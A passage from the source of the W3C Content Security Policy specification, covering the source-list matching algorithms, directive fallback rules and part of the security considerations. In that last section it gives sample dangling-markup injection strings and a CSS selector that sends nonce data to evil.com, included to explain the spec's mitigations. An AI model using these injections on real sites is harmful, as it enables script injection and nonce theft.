              <a>"parser-inserted"</a>, return "`Blocked`".

              Otherwise, return "`Allowed`".

              Note: "<a grammar>`'strict-dynamic'`</a>" is explained in more detail
              in [[#strict-dynamic-usage]].

      4.  If the result of executing [[#match-request-to-source-list]] on
          |request|, |directive|'s <a for="directive">value</a>, and |policy|,
          is "`Does Not Match`", return "`Blocked`".

  2.  Return "`Allowed`".

  <h5 algorithm id="script-post-request">
    Script directives post-request check
  </h5>

  This directive's <a for="directive">post-request check</a> is as follows:

  Given a <a for="/">request</a> |request|, a <a>response</a> |response|,
  a <a>directive</a> |directive|, and a <a for="/">policy</a> |policy|:

  1.  If |request|'s <a for="request">destination</a> is <a for="request/destination">script-like</a>:

      1.  If the result of executing [[#match-nonce-to-source-list]] on
          |request|'s <a for="request">cryptographic nonce metadata</a> and this
          directive's <a for="directive">value</a> is "`Matches`", return
          "`Allowed`".

      2.  If the result of executing
          [[#match-integrity-metadata-to-source-list]] on |request|'s <a
          for="request">integrity metadata</a> and this directive's <a
          for="directive">value</a> is "`Matches`", return "`Allowed`".

      3.  If |directive|'s <a for="directive">value</a> contains
          "<a grammar>`'strict-dynamic'`</a>":

          1.  If |request|'s <a for="request">parser metadata</a> is not
              <a>"parser-inserted"</a>, return "`Allowed`".

              Otherwise, return "`Blocked`".

      4.  If the result of executing [[#match-response-to-source-list]] on
          |response|, |request|, |directive|'s <a for="directive">value</a>,
          and |policy|, is "`Does Not Match`", return "`Blocked`".

  2.  Return "`Allowed`".

  <h4 id="matching-urls">URL Matching</h4>

  <h5 id="does-request-violate-policy" algorithm>
    Does |request| violate |policy|?
  </h5>

  Given a <a for="/">request</a> |request| and a <a for="/">policy</a> |policy|, this
  algorithm returns the violated <a>directive</a> if the request violates the
  policy, and "`Does Not Violate`" otherwise.

  1.  If |request|'s [=request/initiator=] is "`prefetch`", then return the result of executing
      [[#does-resource-hint-violate-policy]] on |request| and |policy|.

  2.  Let |violates| be "`Does Not Violate`".

  3.  <a for=set>For each</a> |directive| of |policy|:

      1.  Let |result| be the result of executing |directive|'s
          <a for="directive">pre-request check</a> on |request| and |policy|.

      2.  If |result| is "`Blocked`", then let |violates| be |directive|.

  4.  Return |violates|.

  <h5 id="does-resource-hint-violate-policy">
    Does resource hint |request| violate |policy|?
  </h5>

  Given a <a for="/">request</a> |request| and a <a for="/">policy</a> |policy|, this
  algorithm returns the default <a>directive</a> if the resource-hint request violates all the
  policies, and "`Does Not Violate`" otherwise.

  1. Let |defaultDirective| be |policy|'s first [=directive=] whose [=directive/name=] is
      "`default-src`".

  2. If |defaultDirective| does not exist, return "`Does Not Violate`".

  3. <a for=set>For each</a> |directive| of |policy|:

      1.  Let |result| be the result of executing |directive|'s
          <a for="directive">pre-request check</a> on |request| and |policy|.

      2. If |result| is "`Allowed`", then return "`Does Not Violate`".

  4. Return |defaultDirective|.

  <h5 id="match-nonce-to-source-list" algorithm>
    Does |nonce| match |source list|?
  </h5>

  Given a <a for="/">request</a>'s <a for="request">cryptographic nonce metadata</a>
  |nonce| and a <a>source list</a> |source list|, this algorithm returns
  "`Matches`" if the nonce matches one or more source expressions in the list,
  and "`Does Not Match`" otherwise:

  1.  Assert: |source list| is not null.

  2.  If |nonce| is the empty string, return "`Does Not Match`".

  3.  <a for=set>For each</a> |expression| of |source list|:

      1.  If |expression| matches the <a grammar>`nonce-source`</a> grammar,
          and |nonce| is <a for="string" lt="is">identical to</a> |expression|'s
          <a grammar>`base64-value`</a> part, return "`Matches`".

  4.  Return "`Does Not Match`".

  <h5 id="match-integrity-metadata-to-source-list" algorithm>
    Does |integrity metadata| match |source list|?
  </h5>

  Given a <a for="/">request</a>'s <a for="request">integrity metadata</a>
  |integrity metadata| and a <a>source list</a> |source list|, this algorithm
  returns "`Matches`" if the integrity metadata matches one or more source
  expressions in the list, and "`Does Not Match`" otherwise:

  1.  Assert: |source list| is not null.

  2.  Let |integrity expressions| be the set of <a>source expressions</a> in
      |source list| that match the <a grammar>hash-source</a> grammar.

  3.  If |integrity expressions| is empty, return "`Does Not Match`".

  4.  Let |integrity sources| be the result of executing the algorithm defined
      in [[SRI#parse-metadata]] on |integrity metadata|. [[!SRI]]

  5.  If |integrity sources| is "`no metadata`" or an empty set, return "`Does
      Not Match`".

  6.  <a for=set>For each</a> |source| of |integrity sources|:

      1.  If |integrity expressions| does not contain a <a>source expression</a>
          whose <a grammar>hash-algorithm</a> is an <a>ASCII
          case-insensitive</a> match for |source|'s <a
          grammar>hash-algorithm</a>, and whose <a grammar>base64-value</a> is
          <a for="string" lt="is">identical to</a> |source|'s `base64-value`,
          return "`Does Not Match`".

  7.  Return "`Matches`".

  Note: Here, we verify only whether the |integrity metadata| is a non-empty
  subset of the <a grammar>hash-source</a> sources in |source list|. We rely on
  the browser's enforcement of Subresource Integrity [[!SRI]] to block
  non-matching resources upon response.

  <h5 id="match-request-to-source-list" algorithm>
    Does |request| match |source list|?
  </h5>

  Given a <a for="/">request</a> |request|, a <a>source list</a> |source list|,
  and a <a for="/">policy</a> |policy|, this algorithm returns the result of executing
  [[#match-url-to-source-list]] on |request|'s <a for="request">current url</a>,
  |source list|, |policy|'s [=policy/self-origin=], and |request|'s
  <a for="request">redirect count</a>.

  Note: This is generally used in <a>directives</a>' <a>pre-request check</a>
  algorithms to verify that a given <a for="/">request</a> is reasonable.

  <h5 id="match-response-to-source-list" algorithm>
    Does |response| to |request| match |source list|?
  </h5>

  Given a <a for="/">request</a> |request|, and a <a>source list</a> |source list|,
  and a <a for="/">policy</a> |policy|, this algorithm returns the result of executing
  [[#match-url-to-source-list]] on |response|'s <a for="response">url</a>,
  |source list|, |policy|'s [=policy/self-origin=], and |request|'s
  <a for="request">redirect count</a>.

  Note: This is generally used in <a>directives</a>' <a>post-request check</a>
  algorithms to verify that a given <a>response</a> is reasonable.

  <h5 id="match-url-to-source-list" algorithm>
    Does |url| match |source list| in |origin| with |redirect count|?
  </h5>

  Given a {{URL}} |url|, a <a>source list</a> |source list|, an
  <a for="/">origin</a> |origin|, and a number |redirect count|, this
  algorithm returns "`Matches`" if the URL matches one or more source
  expressions in |source list|, or "`Does Not Match`" otherwise:

  1.  Assert: |source list| is not null.

  2.  If |source list| [=list/is empty=], return "`Does Not Match`".

  3.  If |source list|'s [=list/size=] is 1, and |source list|[0] is an <a>ASCII
      case-insensitive</a> match for the string "`'none'`", return "`Does Not
      Match`".

      Note: An empty source list (that is, a directive without a value: `script-src`,
      as opposed to `script-src host1`) is equivalent to a source list containing `'none'`,
      and will not match any URL.
      
      Note: The `'none'` keyword has no effect when other source expressions are
      present. That is, the list « `'none'` » does not match any URL. A list consisting
      of « `'none'`, `https://example.com` », on the other hand, would match
      `https://example.com/`.

  4.  <a for=set>For each</a> |expression| of |source list|:

      1.  If [[#match-url-to-source-expression]] returns "`Matches`" when
          executed upon |url|, |expression|, |origin|, and |redirect count|, return
          "`Matches`".

  5.  Return "`Does Not Match`".

  <h5 id="match-url-to-source-expression" algorithm dfn export>
    Does |url| match |expression| in |origin| with |redirect count|?
  </h5>

  Given a {{URL}} |url|, a <a>source expression</a> |expression|, an
  <a for="/">origin</a> |origin|, and a number |redirect count|, this algorithm
  returns "`Matches`" if |url| matches |expression|, and "`Does Not Match`"
  otherwise.

  Note: |origin| is the <a for="/">origin</a> of the resource relative to which the
  |expression| should be resolved. "`'self'`", for instance, will have distinct
  meaning depending on that bit of context.

  1.  If |expression| is the string "*", return "`Matches`" if one or more of
      the following conditions is met:

      1. |url|'s <a for="url">scheme</a> is an <a>HTTP(S) scheme</a>.

      2. |url|'s <a for="url">scheme</a> is the same as |origin|'s <a for="origin">scheme</a>.

      Note: This logic means that in order to allow a resource from a non-<a>HTTP(S) scheme</a>,
      it has to be either explicitly specified (e.g.
      `default-src * data: custom-scheme-1: custom-scheme-2:`),
      or the protected resource must be loaded from the same scheme.

  2.  If |expression| matches the <a grammar>`scheme-source`</a> or
      <a grammar>`host-source`</a> grammar:

      1.  If |expression| has a <a grammar>`scheme-part`</a>, and it does not <a>`scheme-part`
          match</a> |url|'s <a for="url">scheme</a>, return "`Does Not Match`".

      2.  If |expression| matches the <a grammar>`scheme-source`</a> grammar,
          return "`Matches`".

  3.  If |expression| matches the <a grammar>`host-source`</a> grammar:

      1.  If |url|'s {{URL/host}} is null, return "`Does Not Match`".

      2.  If |expression| does not have a <a grammar>`scheme-part`</a>, and |origin|'s
          [=origin/scheme=] does not <a>`scheme-part` match</a> |url|'s <a for="url">scheme</a>,
          return "`Does Not Match`".

          Note: As with <a grammar>`scheme-part`</a> above, we allow schemeless
          <a grammar>`host-source`</a> expressions to be upgraded from insecure
          schemes to secure schemes.

      3.  If |expression|'s <a grammar>`host-part`</a> does not <a>`host-part` match</a> |url|'s
          {{URL/host}}, return "`Does Not Match`".

      4.  Let |port-part| be |expression|'s <a grammar>`port-part`</a> if present, and null
          otherwise.

      5.  If |port-part| does not <a>`port-part` match</a> |url|, return "`Does Not Match`".

      6.  If |expression| contains a non-empty <a grammar>`path-part`</a>, and
          |redirect count| is 0, then:

          1.  Let |path| be the resulting of joining |url|'s <a for="url">path</a>
              on the U+002F SOLIDUS character (`/`).

          2.  If |expression|'s <a grammar>`path-part`</a> does not <a>`path-part` match</a> |path|,
              return "`Does Not Match`".

      7.  Return "`Matches`".

  4.  If |expression| is an <a>ASCII case-insensitive</a> match for "`'self'`",
      return "`Matches`" if one or more of the following conditions is met:

      1.  |origin| is the same as |url|'s <a for="url">origin</a>

      2.  |origin|'s {{URL/host}} is the same as |url|'s {{URL/host}},
          |origin|'s {{URL/port}} and |url|'s {{URL/port}} are either the same
          or the <a>default ports</a> for their respective <a for="url">scheme</a>s, and
          one or more of the following conditions is met:

          1.  |url|'s <a for="url">scheme</a> is "`https`" or "`wss`"
          2.  |origin|'s <a for="url">scheme</a> is "`http`" and |url|'s
              <a for="url">scheme</a> is "`http`" or "`ws`"

      Note: Like the <a grammar>`scheme-part`</a> logic above, the "`'self'`"
      matching algorithm allows upgrades to secure schemes when it is safe to do
      so. We limit these upgrades to endpoints running on the default port for a
      particular scheme or a port that matches the origin of the protected
      resource, as this seems sufficient to deal with upgrades that can be
      reasonably expected to succeed.

  5.  Return "`Does Not Match`".

  <h5 id="match-schemes" algorithm>
    `scheme-part` matching
  </h5>

  An <a>ASCII string</a> <dfn export lt="scheme-part match">`scheme-part` matches</dfn> another
  <a>ASCII string</a> if a CSP source expression that contained the first as a
  <a grammar>`scheme-part`</a> could potentially match a URL containing the latter as a
  [=url/scheme=]. For example, we say that "http" <a>`scheme-part` matches</a> "https".

  Note: The matching relation is asymmetric. For example, the source expressions `https:` and
  `https://example.com/` do not match the URL `http://example.com/`. We always allow a
  secure upgrade from an explicitly insecure expression. `script-src http:` is treated as equivalent
  to `script-src http: https:`, `script-src http://example.com` to `script-src http://example.com
  https://example.com`, and `connect-src ws:` to `connect-src ws: wss:`.

  More formally, two <a>ASCII strings</a> |A| and |B| are said to <a>`scheme-part` match</a> if the
  following algorithm returns "`Matches`":

  <ol class="algorithm">
    1.  If one of the following is true, return "`Matches`":

        1.  |A| is an <a>ASCII case-insensitive</a> match for |B|.

        2.  |A| is an <a>ASCII case-insensitive</a> match for "`http`", and |B|
            is an <a>ASCII case-insensitive</a> match for "`https`".

        3.  |A| is an <a>ASCII case-insensitive</a> match for "`ws`", and |B|
            is an <a>ASCII case-insensitive</a> match for "`wss`", "`http`", or
            "`https`".

        4.  |A| is an <a>ASCII case-insensitive</a> match for "`wss`", and |B|
            is an <a>ASCII case-insensitive</a> match for "`https`".

    2.  Return "`Does Not Match`".
  </ol>

  <h5 id="match-hosts" algorithm>
    `host-part` matching
  </h5>

  An <a>ASCII string</a> <dfn export lt="host-part match">`host-part` matches</dfn> a [=/host=]
  if a CSP source expression that contained the first as a <a grammar>`host-part`</a> could
  potentially match the latter. For example, we say that "www.example.com" <a>host-part matches</a> "www.example.com".

  More formally, <a>ASCII string</a> |pattern| and [=/host=] |host| are said to <a>`host-part` match</a> if the
  following algorithm returns "`Matches`":

  Note: The matching relation is asymmetric. That is, |pattern| matching |host| does not
  mean that |host| will match |pattern|. For example, `*.example.com` <a>`host-part` matches</a>
  `www.example.com`, but `www.example.com` does not <a>`host-part` match</a> `*.example.com`.
  
  Note: A future version of this specification may allow literal IPv6 and IPv4 addresses,
  depending on usage and demand. Given the weak security properties of IP addresses in
  relation to named hosts, however, authors are encouraged to prefer the latter whenever possible.

  <ol class="algorithm">
    1. If |host| is not a [=domain=], return "`Does Not Match`".

    2. If |pattern| is "`*`", return "`Matches`".

    3.  If |pattern| <a>starts with</a> "`*.`":

        1.  Let |remaining| be |pattern| with the leading U+002A (`*`) removed and <a>ASCII lowercased</a>.

        2.  If |host| to <a>ASCII lowercase</a> <a>ends with</a> |remaining|, then return "`Matches`".

        3.  Return "`Does Not Match`".

    4.  If |pattern| is not an <a>ASCII case-insensitive</a> match for |host|, return
        "`Does Not Match`".

    5.  Return "`Matches`".
  </ol>

  <h5 id="match-ports" algorithm>
    `port-part` matching
  </h5>

  An <a>ASCII string</a> |input| <dfn export>`port-part` matches</dfn> [=/URL=] |url| if a CSP source expression that
  contained the first as a <a grammar>`port-part`</a> could potentially match a URL containing the latter's [=url/port=]
  and [=url/scheme=]. For example, "80" <a>`port-part` matches</a> matches http://example.com.

  <ol class="algorithm">
    1.  Assert: |input| is the empty string, "*", or a sequence of <a>ASCII digits</a>.

    2.  If |input| is equal to "*", return "`Matches`".

    3.  Let |normalizedInput| be null if |input| is the empty string; otherwise |input| interpreted as decimal number.
    
    4.  If |normalizedInput| equals |url|'s [=url/port=], return "`Matches`".

    5.  If |url|'s [=url/port=] is null:

        1.  Let |defaultPort| be the <a>default port</a> for |url|'s [=url/scheme=].

        2.  If |normalizedInput| equals |defaultPort|, return "`Matches`".

    6. Return "`Does Not Match`".
  </ol>

  <h5 id="match-paths" algorithm>
    `path-part` matching
  </h5>

  An <a>ASCII string</a> |path A| <dfn export lt="path-part match">`path-part` matches</dfn>
  another <a>ASCII string</a> |path B| if a CSP source expression that contained the first as a
  <a grammar>`path-part`</a> could potentially match a URL containing the latter as a [=url/path=].
  For example, we say that "/subdirectory/" <a>`path-part` matches</a> "/subdirectory/file".

  Note: The matching relation is asymmetric. That is, |path A| matching |path B|
  does not mean that |path B| will match |path A|.

  <ol class="algorithm">
    1.  If |path A| is the empty string, return "`Matches`".

    2.  If |path A| consists of one character that is equal to the U+002F SOLIDUS
        character (`/`) and |path B| is the empty string, return "`Matches`".

    3.  Let |exact match| be `false` if the final character of |path A| is the U+002F
        SOLIDUS character (`/`), and `true` otherwise.

    4.  Let |path list A| and |path list B| be the result of
        <a lt="strictly split a string">strictly splitting</a> |path A| and |path B|
        respectively on the U+002F SOLIDUS character (`/`).

    5.  If |path list A| has more items than |path list B|, return
        "`Does Not Match`".

    6.  If |exact match| is `true`, and |path list A| does not have the same
        number of items as |path list B|, return "`Does Not Match`".

    7.  If |exact match| is `false`:

        1.  Assert: the final item in |path list A| is the empty string.

        2.  Remove the final item from |path list A|.

    8.  <a for=list>For each</a> |piece A| of |path list A|:

        1.  Let |piece B| be the next item in |path list B|.

        2.  Let |decoded piece A| be the <a for=string lt=percent-decode>percent-decoding</a> of
            |piece A|.

        3.  Let |decoded piece B| be the <a for=string lt=percent-decode>percent-decoding</a> of
            |piece B|.

        4.  If |decoded piece A| is not |decoded piece B|, return "`Does Not Match`".

    9.  Return "`Matches`".
  </ol>

  <h4 id="matching-elements">Element Matching Algorithms</h4>

  <h5 id="is-element-nonceable" algorithm>
    Is |element| nonceable?
  </h5>

  Given an {{Element}} |element|, this algorithm returns "`Nonceable`" if
  a <a grammar>`nonce-source`</a> expression can match the element (as discussed
  in [[#security-nonce-hijacking]]), and "`Not Nonceable`" if such expressions
  should not be applied.

  1.  If |element| does not have an attribute named "`nonce`", return "`Not
      Nonceable`".

  2.  If |element| is a <{script}> element, then <a for=list>for each</a> |attribute| of
      |element|'s <a for=Element>attribute list</a>:

      1.  If |attribute|'s name contains an <a>ASCII case-insensitive</a> match for
          "<code>&lt;script</code>" or "<code>&lt;style</code>", return "`Not Nonceable`".

      2.  If |attribute|'s value contains an <a>ASCII case-insensitive</a> match for
          "<code>&lt;script</code>" or "<code>&lt;style</code>", return "`Not Nonceable`".

  3.  If |element| had a [=duplicate-attribute=] [=parse error=] during tokenization, return
      "`Not Nonceable`".

      ISSUE(whatwg/html#3257): We need some sort of hook in HTML to record this error if we're
      planning on using it here.

  4.  Return "`Nonceable`".

  ISSUE(w3c/webappsec-csp#98): This processing is meant to mitigate the risk
  of dangling markup attacks that steal the nonce from an existing element
  in order to load injected script. It is fairly expensive, however, as it
  requires that we walk through all attributes and their values in order to
  determine whether the script should execute. Here, we try to minimize the
  impact by doing this check only for <{script}> elements when a nonce is
  present, but we should probably consider this algorithm as "at risk" until
  we know its impact.

  <h5 id="allow-all-inline" algorithm>
    Does a source list allow all inline behavior for |type|?
  </h5>

  A <a>source list</a>
  <dfn export for="source list" local-lt="allow all inline behavior">allows all inline behavior</dfn>
  of a given |type| if it contains the <a grammar>`keyword-source`</a>
  expression <a grammar>`'unsafe-inline'`</a>, and does not override that
  expression as described in the following algorithm:

  Given a <a>source list</a> |list| and a string |type|, the following
  algorithm returns "`Allows`" if all inline content of a given |type| is
  allowed and "`Does Not Allow`" otherwise.

  1.  Let |allow all inline| be `false`.

  2.  <a for=set>For each</a> |expression| of |list|:

      1.  If |expression| matches the <a grammar>`nonce-source`</a> or
          <a grammar>`hash-source`</a> grammar, return "`Does Not Allow`".

      2.  If |type| is "`script`", "`script attribute`" or "`navigation`"
          and |expression| matches the <a grammar>keyword-source</a>
          "<a grammar>`'strict-dynamic'`</a>", return "`Does Not Allow`".

          Note: `'strict-dynamic'` only applies to scripts, not other resource
          types. Usage is explained in more detail in [[#strict-dynamic-usage]].

      3.  If |expression| is an <a>ASCII case-insensitive</a> match for the
          <a grammar>`keyword-source`</a> "<a grammar>`'unsafe-inline'`</a>",
          set |allow all inline| to `true`.

  3.  If |allow all inline| is `true`, return "`Allows`".
      Otherwise, return "`Does Not Allow`".

  <div class="example">
    <a>Source lists</a> that
    <a for="source list">allow all inline behavior</a>:

    <pre>
      'unsafe-inline' http://a.com http://b.com
      'unsafe-inline'
    </pre>

    <a>Source lists</a> that do not
    <a for="source list">allow all inline behavior</a> due to
    the presence of nonces and/or hashes, or absence of '`unsafe-inline`':

    <pre>
      'sha512-321cba' 'nonce-abc'
      http://example.com 'unsafe-inline' 'nonce-abc'
    </pre>

     <a>Source lists</a> that do not
     <a for="source list">allow all inline behavior</a> when |type| is
     '`script`' or '`script attribute`' due to the presence of
     '`strict-dynamic`', but <a for="source list">allow all inline behavior</a>
     otherwise:

     <pre>
      'unsafe-inline' 'strict-dynamic'
      http://example.com 'strict-dynamic' 'unsafe-inline'
    </pre>
  </div>

  <h5 id="match-element-to-source-list" algorithm>
    Does |element| match source list for |type| and |source|?
  </h5>

  Given an {{Element}} |element|, a <a>source list</a> |list|, a string
  |type|, and a string |source|, this algorithm returns "`Matches`" or
  "`Does Not Match`".

  Note: Regardless of the encoding of the document, |source| will be converted
  to `UTF-8` before applying any hashing algorithms.

  1.  If [[#allow-all-inline]] returns "`Allows`" given |list| and |type|,
      return "`Matches`".

  2.  If |type| is "`script`" or "`style`", and [[#is-element-nonceable]]
      returns "`Nonceable`" when executed upon |element|:

      1.  <a for=set>For each</a> |expression| of |list|:

          1.  If |expression| matches the <a grammar>`nonce-source`</a> grammar,
              and |element| has a <{htmlsvg-global/nonce}> attribute whose value
              [=string/is=] |expression|'s <a grammar>`base64-value`</a> part,
              return "`Matches`".

      Note: Nonces only apply to inline <{script}> and inline <{style}>, not to
      attributes of either element or to `javascript:` navigations.

  3.  Let |unsafe-hashes flag| be `false`.

  4.  <a for=set>For each</a> |expression| of |list|:

      1.  If |expression| is an <a>ASCII case-insensitive</a> match for the
          <a grammar>`keyword-source`</a>
          "<a grammar>`'unsafe-hashes'`</a>",
          set |unsafe-hashes flag| to `true`. Break out of the loop.

  5.  If |type| is "`script`" or "`style`", or |unsafe-hashes flag| is
      `true`:

      1.  Set |source| to the result of executing <a>UTF-8 encode</a>
          on the result of executing <a for="JavaScript string" data-lt="convert">JavaScript string converting</a>
          on |source|.

      2.  <a for=set>For each</a> |expression| of |list|:

          1.  If |expression| matches the <a grammar>`hash-source`</a> grammar:

              1.  Let |algorithm| be null.

              2.  If |expression|'s <a grammar>`hash-algorithm`</a> part is an
                  <a>ASCII case-insensitive</a> match for "sha256", set
                  |algorithm| to <a>SHA-256</a>.

              3.  If |expression|'s <a grammar>`hash-algorithm`</a> part is an
                  <a>ASCII case-insensitive</a> match for "sha384", set
                  |algorithm| to <a>SHA-384</a>.

              4.  If |expression|'s <a grammar>`hash-algorithm`</a> part is an
                  <a>ASCII case-insensitive</a> match for "sha512", set
                  |algorithm| to <a>SHA-512</a>.

              5.  If |algorithm| is not null:

                  1.  Let |actual| be the result of <a>base64 encoding</a> the
                      result of applying |algorithm| to |source|.

                  2.  Let |expected| be |expression|'s <a grammar>`base64-value`</a> part,
                      with all '`-`' characters replaced with '`+`', and all '`_`' characters
                      replaced with '`/`'.

                      Note: This replacement normalizes hashes expressed in [=base64url
                      encoding=] into [=base64 encoding=] for matching.

                  3.  If |actual| is <a for="string" lt="is">identical to</a>
                      |expected|, return "`Matches`".

      Note: Hashes apply to inline <{script}> and inline <{style}>. If the
      "<a grammar>`'unsafe-hashes'`</a>" source expression is present,
      they will also apply to event handlers, style attributes and `javascript:`
      navigations.

  ISSUE(w3c/webappsec-csp#426): This should handle `'strict-dynamic'` for dynamically inserted inline scripts.

  6.  Return "`Does Not Match`".

  <h3 id="directive-algorithms">Directive Algorithms</h3>

  <h4 id="effective-directive-for-a-request" algorithm>
    Get the effective directive for |request|
  </h4>

  Each <a>fetch directive</a> controls a specific destination of <a for="/">request</a>. Given
  a <a for="/">request</a> |request|, the following algorithm returns either
  null or the <a for="directive">name</a> of the request's
  <dfn for="request" export>effective directive</dfn>:

  1.  If |request|'s [=request/initiator=] is "`prefetch`" or "`prerender`",
      return `default-src`.

  2.  Switch on |request|'s <a for="request">destination</a>, and execute
      the associated steps:

      : the empty string
      ::
        1.  Return `connect-src`.
      : "`manifest`"
      ::
        1.  Return `manifest-src`.
      : "`object`"
      : "`embed`"
      ::
        1.  Return `object-src`.
      : "`frame`"
      : "`iframe`"
      ::
        1.  Return `frame-src`.

      : "`audio`"
      : "`track`"
      : "`video`"
      ::
        1.  Return `media-src`.


      : "`font`"
      ::
        1.  Return `font-src`.

      : "`image`"
      ::
        1.  Return `img-src`.

      : "`style`"
      ::
        1.  Return `style-src-elem`.

      : "`script`"
      : "`xslt`"
      : "`audioworklet`"
      : "`paintworklet`"
      ::
        1. Return `script-src-elem`.

      : "`serviceworker`"
      : "`sharedworker`"
      : "`worker`"
      ::
        1. Return `worker-src`.

      : "`json`"
      : "`webidentity`"
      ::
        1. Return `connect-src`.

      : "`report`"
      ::
        1. Return null.

  3.  Return `connect-src`.

  Note: The algorithm returns `connect-src` as a default fallback. This is
  intended for new fetch destinations that are added and which don't explicitly
  fall into one of the other categories.

  <h4 id="effective-directive-for-inline-check" algorithm>
    Get the effective directive for inline checks
  </h4>

  Given a string |type|, this algorithm returns the <a for="directive">name</a>
  of the effective directive.

  Note: While the <a for="request">effective directive</a> is only defined for
  <a for="/">requests</a>, in this algorithm it is used similarly to mean
  the directive that is most relevant to a particular type of inline check.

  1.  Switch on |type|:

      : "`script`"
      : "`navigation`"
      ::
        1.  Return `script-src-elem`.
      : "`script attribute`"
      ::
        1.  Return `script-src-attr`.
      : "`style`"
      ::
        1.  Return `style-src-elem`.
      : "`style attribute`"
      ::
        1.  Return `style-src-attr`.
  2.  Return null.

  <h4 id="directive-fallback-list" algorithm>
    Get fetch directive fallback list
  </h4>

  Will return an <a>ordered set</a> of the fallback <a>directives</a> for a specific <a>directive</a>.
  The returned <a>ordered set</a> is sorted from most relevant to least relevant
  and it includes the effective directive itself.

  Given a string |directive name|:

  1.  Switch on |directive name|:

      : "`script-src-elem`"
      ::
        1.  Return `<< "script-src-elem", "script-src", "default-src" >>`.

      : "`script-src-attr`"
      ::
        1.  Return `<< "script-src-attr", "script-src", "default-src" >>`.

      : "`style-src-elem`"
      ::
        1.  Return `<< "style-src-elem", "style-src", "default-src" >>`.

      : "`style-src-attr`"
      ::
        1.  Return `<< "style-src-attr", "style-src", "default-src" >>`.

      : "`worker-src`"
      ::
        1.  Return `<< "worker-src", "child-src", "script-src", "default-src" >>`.

      : "`connect-src`"
      ::
        1.  Return `<< "connect-src", "default-src" >>`.

      : "`manifest-src`"
      ::
        1.  Return `<< "manifest-src", "default-src" >>`.

      : "`object-src`"
      ::
        1.  Return `<< "object-src", "default-src" >>`.

      : "`frame-src`"
      ::
        1.  Return `<< "frame-src", "child-src", "default-src" >>`.

      : "`media-src`"
      ::
        1.  Return `<< "media-src", "default-src" >>`.

      : "`font-src`"
      ::
        1.  Return `<< "font-src", "default-src" >>`.

      : "`img-src`"
      ::
        1.  Return `<< "img-src", "default-src" >>`.

  2.  Return `<< >>`.

  <h4 id="should-directive-execute" algorithm>
    Should fetch directive execute
  </h4>

  This algorithm is used for <a>fetch directives</a> to decide whether a directive
  should execute or defer to a different directive that is better suited.
  For example: if the |effective directive name| is `worker-src` (meaning that
  we are currently checking a worker request), a `default-src` directive
  should not execute if a `worker-src` or `script-src` directive exists.

  Given a string |effective directive name|, a string |directive name| and
  a <a for="/">policy</a> |policy|:

  1.  Let |directive fallback list| be the result of executing [[#directive-fallback-list]]
      on |effective directive name|.

  2.  <a for=set>For each</a> |fallback directive| of |directive fallback list|:

      1.  If |directive name| is |fallback directive|, Return "`Yes`".

      2.  If |policy| contains a directive whose <a for="directive">name</a>
          is |fallback directive|,  Return "`No`".

  3.  Return "`No`".

</section>

<!-- Big text: Security -->
<section>
  <h2 id="security-considerations">Security and Privacy Considerations</h2>

  <h3 id="security-nonces">Nonce Reuse</h3>

  Nonces override the other restrictions present in the directive in which
  they're delivered. It is critical, then, that they remain unguessable, as
  bypassing a resource's policy is otherwise trivial.

  If a server delivers a <a grammar>nonce-source</a> expression as part of a
  <a for="/">policy</a>, the server MUST generate a unique value each time it
  transmits a policy. The generated value SHOULD be at least 128 bits long
  (before encoding), and SHOULD be generated via a cryptographically secure
  random number generator in order to ensure that the value is difficult for
  an attacker to predict.

  Note: Using a nonce to allow inline script or style is less secure than
  not using a nonce, as nonces override the restrictions in the directive in
  which they are present. An attacker who can gain access to the nonce can
  execute whatever script they like, whenever they like. That said, nonces
  provide a substantial improvement over <a grammar>'unsafe-inline'</a> when
  layering a content security policy on top of old code. When considering
  <a grammar>'unsafe-inline'</a>, authors are encouraged to consider nonces
  (or hashes) instead.

  <h3 id="security-nonce-hijacking">Nonce Hijacking</h3>

  <h4 id="dangling-markup-attacks">Dangling markup attacks</h4>

  Dangling markup attacks such as those discussed in [[FILEDESCRIPTOR-2015]]
  can be used to repurpose a page's legitimate nonces for injections. For
  example, given an injection point before a <{script}> element:

  <pre highlight="html">
    &lt;p&gt;Hello, [INJECTION POINT]&lt;/p&gt;
    &lt;script nonce=abc src=/good.js&gt;&lt;/script&gt;
  </pre>

  If an attacker injects the string "<code>&lt;script src='https://evil.com/evil.js' </code>",
  then the browser will receive the following:

  <pre highlight="html">
    &lt;p&gt;Hello, &lt;script src='https://evil.com/evil.js' &lt;/p&gt;
    &lt;script nonce=abc src=/good.js&gt;&lt;/script&gt;
  </pre>

  It will then parse that code, ending up with a <{script}> element with a
  `src` attribute pointing to a malicious payload, an attribute named `</p>`,
  an attribute named "<code>&lt;script</code>", a `nonce` attribute, and a
  second `src` attribute which is helpfully discarded as duplicate by the parser.

  The [[#is-element-nonceable]] algorithm attempts to mitigate this specific
  attack by walking through <{script}> or <{style}> element attributes, looking for the
  string "<code>&lt;script</code>" or "<code>&lt;style</code>" in their names or values.

  User-agents must pay particular attention when implementing this algorithm to
  not ignore duplicate attributes. If an element has a duplicate attribute any
  instance of the attribute after the first one is ignored but in the
  [[#is-element-nonceable]] algorithm, all attributes including the
  duplicate ones need to be checked.

  ISSUE(whatwg/html#3257): Currently the HTML spec's parsing algorithm removes this information
  before the [[#is-element-nonceable]] algorithm can be run which makes it
  impossible to actually detect duplicate attributes.

  For the following example page:

  <pre highlight="html">
    Hello, [INJECTION POINT]
    &lt;script nonce=abc src=/good.js&gt;&lt;/script&gt;
  </pre>

  The following injected string will use a duplicate attribute to attempt to
  bypass the [[#is-element-nonceable]] algorithm check:

  <pre highlight="html">
    Hello, &lt;script src='https://evil.com/evil.js' x="" x=
    &lt;script nonce="abcd" src=/good.js&gt;&lt;/script&gt;
  </pre>

  <h4 id="nonce-exfiltration-content-attributes">Nonce exfiltration via content attributes</h4>

  Some attacks on CSP rely on the ability to exfiltrate
  nonce data via various mechanisms that can read content attributes.
  CSS selectors are the best example: through clever use of
  prefix/postfix text matching selectors values can be sent out to an
  attacker's server for reuse. Example:

  <pre highlight="css">
    script[nonce=a] { background: url("https://evil.com/nonce?a");}
  </pre>

  The <{htmlsvg-global/nonce}> section talks about mitigating these types
  of attacks by hiding the nonce from the element's content attribute and
  moving it into an internal slot. This is done to ensure that the `nonce`
  value is exposed to scripts but not any other non-script channels.

  <h3 id="security-nonce-retargeting">Nonce Retargeting</h3>

  Nonces bypass <a grammar>host-source</a> expressions, enabling developers to load code from any
  origin. This, generally, is fine, and desirable from the developer's perspective. However, if an
  attacker can inject a <{base}> element, then an otherwise safe page can be subverted when relative
  URLs are resolved. That is, on `https://example.com/` the following code will load
  `https://example.com/good.js`:

  <pre highlight="html">
